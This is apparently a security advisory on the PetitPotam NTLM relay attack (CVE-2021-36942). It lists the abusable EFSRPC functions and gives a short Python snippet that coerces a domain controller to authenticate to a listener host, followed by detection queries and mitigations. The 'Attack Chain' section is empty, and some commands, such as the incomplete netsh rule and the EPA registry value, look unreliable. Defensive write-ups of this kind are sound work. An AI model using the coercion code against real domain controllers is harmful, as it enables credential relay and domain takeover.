PetitPotam NTLM Relay Attack (CVE-2021-36942)
Affected Systems:
Windows Server 2022
Windows Server 2019
Windows Server 2016
Active Directory Certificate Services
Executive Summary
PetitPotam is an authentication attack that forces Windows systems to authenticate to an attacker-controlled computer using NTLM. When combined with Active Directory Certificate Services (AD CS), it can lead to full domain compromise.
Technical Analysis
The attack abuses the Encrypting File System Remote (EFSR) protocol to coerce authentication. By sending specially crafted RPC calls, attackers can force domain controllers to authenticate to them.
EFS RPC Exploitation
# PetitPotam trigger functions
vulnerable_functions = [
"EfsRpcOpenFileRaw",
"EfsRpcEncryptFileSrv",
"EfsRpcDecryptFileSrv",
"EfsRpcQueryUsersOnFile",
"EfsRpcQueryRecoveryAgents"
]
# Example RPC call
def trigger_auth(target_dc, listener):
binding = f"ncacn_np:{target_dc}[\PIPE\lsarpc]"
rpc_con = transport.DCERPCTransportFactory(binding)
dce = rpc_con.get_dce_rpc()
# Trigger authentication
EfsRpcOpenFileRaw(dce, f"\\{listener}\share\file")
Attack Chain
Domain Compromise Steps
Impact Assessment
- Domain Compromise: Full Active Directory takeover
- Credential Theft: Access to all domain credentials
- Persistence: Long-term access via certificates
- Lateral Movement: Unrestricted network access
Detection Methods
# Monitor for EFSRPC calls
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=5145} |
Where-Object {$_.Message -match "\\lsarpc" -and $_.Message -match "EfsRpc"}
# Check for suspicious certificate enrollments
Get-WinEvent -LogName 'Security' -FilterXPath "*[System[(EventID=4887)]]" |
Where-Object {$_.Message -match "Domain Controller"}
# Monitor NTLM authentication
auditpol /set /subcategory:"Logon" /success:enable /failure:enable
Mitigation Strategies
Immediate Mitigations
- Disable NTLM on AD CS:
# Configure IIS to require Kerberos
Set-WebConfigurationProperty -pspath 'MACHINE/WEBROOT/APPHOST/Default Web Site/CertSrv' -filter "system.webServer/security/authentication/windowsAuthentication" -name "providers" -value @{value='Negotiate:Kerberos'}
- RPC Filters:
# Block unnecessary RPC interfaces
netsh rpc filter add rule layer=um actiontype=block
- Extended Protection:
# Enable EPA on Certificate Services
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration" -Name "EPAEnabled" -Value 1
Long-term Solutions
- Disable NTLM authentication domain-wide
- Implement certificate template restrictions
- Network segmentation for CA servers
- Monitor certificate issuance